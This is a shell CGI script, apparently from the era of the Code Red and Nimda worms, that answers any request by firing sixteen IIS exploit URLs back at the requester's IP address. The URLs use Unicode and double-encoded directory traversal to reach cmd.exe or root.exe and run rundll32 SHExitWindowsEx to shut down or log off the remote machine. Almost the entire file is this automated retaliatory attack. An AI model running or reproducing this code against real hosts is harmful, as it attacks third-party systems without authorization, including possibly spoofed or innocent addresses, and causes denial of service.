#!/bin/sh

LOGFILE=/tmp/killserverlog

echo "Content-type: text/html"
echo ""
echo ""
echo "This server is immune to code red, nimda, and friends. Go away"
echo "<BR>"
echo "<BR>"
echo "<PRE>"

if ( grep $REMOTE_ADDR /etc/hosts > /dev/null 2>&1 ) ||
   ( host chunky.dyndns.org | grep $REMOTE_ADDR > /dev/null 2>&1 ) ||
   ( echo $REQUEST_URI | grep SHExitWindowsEx > /dev/null 2>&1 ) ; then
 echo "<BR><BR>"
 echo "You're either about to DoS yourself,<BR>"
 echo "or someone's forging IP addresses<BR>"
 exit 0
fi

lynx -mime_header http://$REMOTE_ADDR/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
lynx -mime_header http://$REMOTE_ADDR/MSADC/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
lynx -mime_header http://$REMOTE_ADDR/c/winnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
lynx -mime_header http://$REMOTE_ADDR/d/winnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
lynx -mime_header http://$REMOTE_ADDR/scripts/..%255c../winnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
lynx -mime_header http://$REMOTE_ADDR/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
lynx -mime_header http://$REMOTE_ADDR/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
lynx -mime_header http://$REMOTE_ADDR/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
lynx -mime_header http://$REMOTE_ADDR/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
lynx -mime_header http://$REMOTE_ADDR/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
lynx -mime_header http://$REMOTE_ADDR/scripts/..%c0%af../winnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
lynx -mime_header http://$REMOTE_ADDR/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
lynx -mime_header http://$REMOTE_ADDR/scripts/..%%35%63../winnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
lynx -mime_header http://$REMOTE_ADDR/scripts/..%%35c../winnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
lynx -mime_header http://$REMOTE_ADDR/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
lynx -mime_header http://$REMOTE_ADDR/scripts/..%252f../winnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
echo "</PRE>"

echo http://$REMOTE_ADDR  Just attacked me... | write gjb105 ttyS0

echo "<BR><BR>Thanks"
exit 0